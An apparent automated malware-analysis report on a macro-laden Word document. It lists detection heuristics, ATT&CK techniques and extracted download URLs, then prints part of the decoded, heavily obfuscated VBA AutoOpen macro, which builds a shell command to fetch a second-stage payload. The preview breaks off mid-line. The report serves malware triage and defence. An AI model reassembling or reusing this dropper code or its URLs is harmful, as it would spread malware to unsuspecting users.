MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses the Shell() function to execute code, likely downloading a second-stage payload from the embedded URL 'http://www.idistribXrR+XrRution.eu/bBgoXrR+Xr'. The obfuscation and the suspicious URL indicate downloader or dropper functionality.
Heuristics (7):
- ClamAV: Doc.Macro.Obfuscation-6389653-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.Obfuscation-6389653-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://wwwXrR+XrR.i (in document text, OLE body)
  - http://www.idistribXrR+XrRution.eu/bBgoXrR+Xr (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 127290 bytes |

SHA-256: 5902e7d5c931e6be9f3cbb5fe59bce65c27eabbbe25e7ac00be8af1f5e8f52b9
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZssrMBODVRc"
Function iWKvDMcEGk()
ZwXQdBJZ = Array(Trim(Len("bzJsVYzmaPHqnK" + "riUroWXU")), Trim(Len("pCooWAshEAZ" + "zUQwswzSsi")), Trim(Len("UoRNJBt" + "DddDTjLQaXa")), Trim(Len("nkmuJEuwaaCm" + "AUzEnifK")), Trim(Len("WvTQzNjjXv" + "vOjBXDFGz")), Trim(Len("dbrvSOL" + "moubPOqa")), Trim(Len("HhPtCGTLmlwjk" + "ZNWsUbViwVU")), Trim(Len("GYTzUKwKwZhH" + "UYjfdNfCLUO")))
SosHTAOdj = Mid("UWz0jIzkXHYk+'+'HYkrR+XrREWkaXrR+X'+'rRrapaXrR+XrRs'+' + GXrR+XrRN3.eXrR+HYk+HYkXrRxHYk+H'+'YkXrR'+'+XrReGN3;XaiddTS", 8, 103)
bCppOhNtcs = Array(Trim(Len("QldJiQAIJDF" + "uuJUjNzqpz")), Trim(Len("SiTjGLRTqcqL" + "YEwVApDsnGKVkJ")), Trim(Len("knPmTAKbKktzrk" + "tEiOviPdq")), Trim(Len("tsibJKWCXjCNEs" + "NdnlGsLHYMFmWN")), Trim(Len("UKYmZHjAB" + "XuUAMjAqUi")), Trim(Len("brjHilF" + "DXzoHOroR")), Trim(Len("mhclMjzrG" + "jFwCfOsT")), Trim(Len("frWamwBXGNmUr" + "YhAYpiAJrith")))
sRkJMF = Array(Trim(Len("WWzXciuZSAurn" + "njaiAfPRA")), Trim(Len("lzVIpiu" + "FGwozmV")), Trim(Len("niIUdrsMZvcjU" + "dFWvmdNlkjFq")), Trim(Len("jSzlnJJrjIjZ" + "GIitGOjWdsSBAs")), Trim(Len("BwYOnFMuaJo" + "LqwwqWsWEC")), Trim(Len("drHPCZhjnQfqi" + "RlouOIjRqXfh")), Trim(Len("bfHWZzHuXfpJUs" + "BHfANMYlEb")), Trim(Len("uGMAjjUcFEftG" + "apuFwktPKQjsf")))
SzmvYw = Array(Trim(Len("mrAzJbKQ" + "GBailanSsYBFcA")), Trim(Len("WwnGTKcKGvnlI" + "qmLQjRfrHK")), Trim(Len("iNfBSCKqJdMn" + "wliqTiz")), Trim(Len("iwBlqoviMipdV" + "wwIosduzsiwHU")), Trim(Len("noYYMvzQdPcOPH" + "wWKiGohhfpUufE")), Trim(Len("niUAvXFQRa" + "fSsLiOmBtHoZN")), Trim(Len("FGtirATM" + "ctuPMZtG")), Trim(Len("HQJPpTLGIdLPz" + "GtpQMhZZ")))
sujmnNNUm = Mid("BWk7Uu5bAl6BP4rRV1Y1nvRCKaHK48cQV0HR1uUM2", 15, 2)
aaXhAYi = Array(Trim(Len("kDuDujEBiX" + "GprnUVNZJnWifG")), Trim(Len("wiwwQrEBsCKcz" + "mZHXJrvBcp")), Trim(Len("WTVjNYOwDmaElG" + "BnzlKtO")), Trim(Len("XNPHVOv" + "BHCtYjUfdwfvkL")), Trim(Len("VQFqHCqfAI" + "zTzRtiIsY")), Trim(Len("jMfSTTHNOSQMsu" + "QYnsKbClHlBhM")), Trim(Len("wmsmXmD" + "XoijRlpAkb")), Trim(Len("acJUANV" + "bYjSlvLRfYaU")))
JsAwEqol = Array(Trim(Len("TLQRjzZbzB" + "RwzqRZXlsqAqck")), Trim(Len("VXJhYTiupDYBb" + "iBLOEsKv")), Trim(Len("wmKnhfSVnhvdCS" + "dbjBHmtXv")), Trim(Len("JoocYsdaYKu" + "fAOXilUfi")), Trim(Len("jtlcIInMFOP" + "YrisOoSC")), Trim(Len("HXPvinkEHDP" + "dFvqvjVnLFjwWc")), Trim(Len("spWfNbBbVW" + "ZVCHzKzJvliC")), Trim(Len("FwPSCrRZG" + "rOlXCXbdZ")))
mYPMkKQJSP = Array(Trim(Len("KAcqUEECO" + "bvuCjOcjq")), Trim(Len("NJIWikwakfQdQn" + "tmUkMlukKvzIc")), Trim(Len("vYlZoBAsF" + "jHdSizzi")), Trim(Len("JqbIviIS" + "wbjcUMpHiE")), Trim(Len("lsBjMAEHcBM" + "UBTXTQpvjjbtiY")), Trim(Len("nRcbStCU" + "puvuaApXl")), Trim(Len("OaAoVqpIvCQ" + "CouQqAau")), Trim(Len("SjCiYUu" + "jtEIBJfncH")))
BOSEf = Mid("10jzpaHlSztz9iE4auAP[cHAr]97),[strinG][cHAr]36)) ').rEPLaCe('HYk',[STriNg][chAR]39)) tQzZmNdwHUWHrTQEM", 21, 65)
fkJoNPiBOm = Array(Trim(Len("OJAkEHVwMh" + "KnDaQMjZiEHT")), Trim(Len("LsLnzmT" + "JhEvwfOu")), Trim(Len("SNZdhbizlL" + "EuPHquYLwiAaN")), Trim(Len("AFziUhViJlu" + "cdRdpLacDORzF")), Trim(Len("GCwmSmM" + "jVjTRdWZliMzSv")), Trim(Len("SsozkbmoBYSaSj" + "THjczvuVuz")), Trim(Len("dcnkHjL" + "jtdnbYuh")), Trim(Len("uzCDtOKERpzw" + "WuCfzJBRQi")))
riwozYlrwob = Array(Trim(Len("ckGSzisHAJJp" + "qXvuzGwWunPIMw")), Trim(Len("iOdNtoR" + "LOCzjMuLWD")), Trim(Len("SdOlpWKO" + "zrJnkrdlfvwI")), Trim(Len("DjfuGPJAbs" + "FfXQcnr")), Trim(Len("ajXUEPPpjIfa" + "wtaiFuPu")), Trim(Len("iVwEhET" + "JsENipjPb")), Trim(Len("qaarvSzHlzm" + "tboUBBVzhL")), Trim(Len("VznWtQEtOi" + "ZUiqajHaS")))
UiKTZ = Array(Trim(Len("avihJmFMf" + "jWvDnGSXtwFjhw")), Trim(Len("zPCfbDRliVLT" + "ozlndolwSD")), Trim(Len("iRAvvJrOmwMX" + "jEqPkQh")), Trim(Len("nzjwLRFsKmf" + "VAJDWqVi")), Trim(Len("jVcaiGZwWLBWEr" + "QzjrmVcMjL")), Trim(Len("jumtuvDfGcGW" + "KfunaipRIqm")), Trim(Len("GdrcEIwPBa
... (truncated)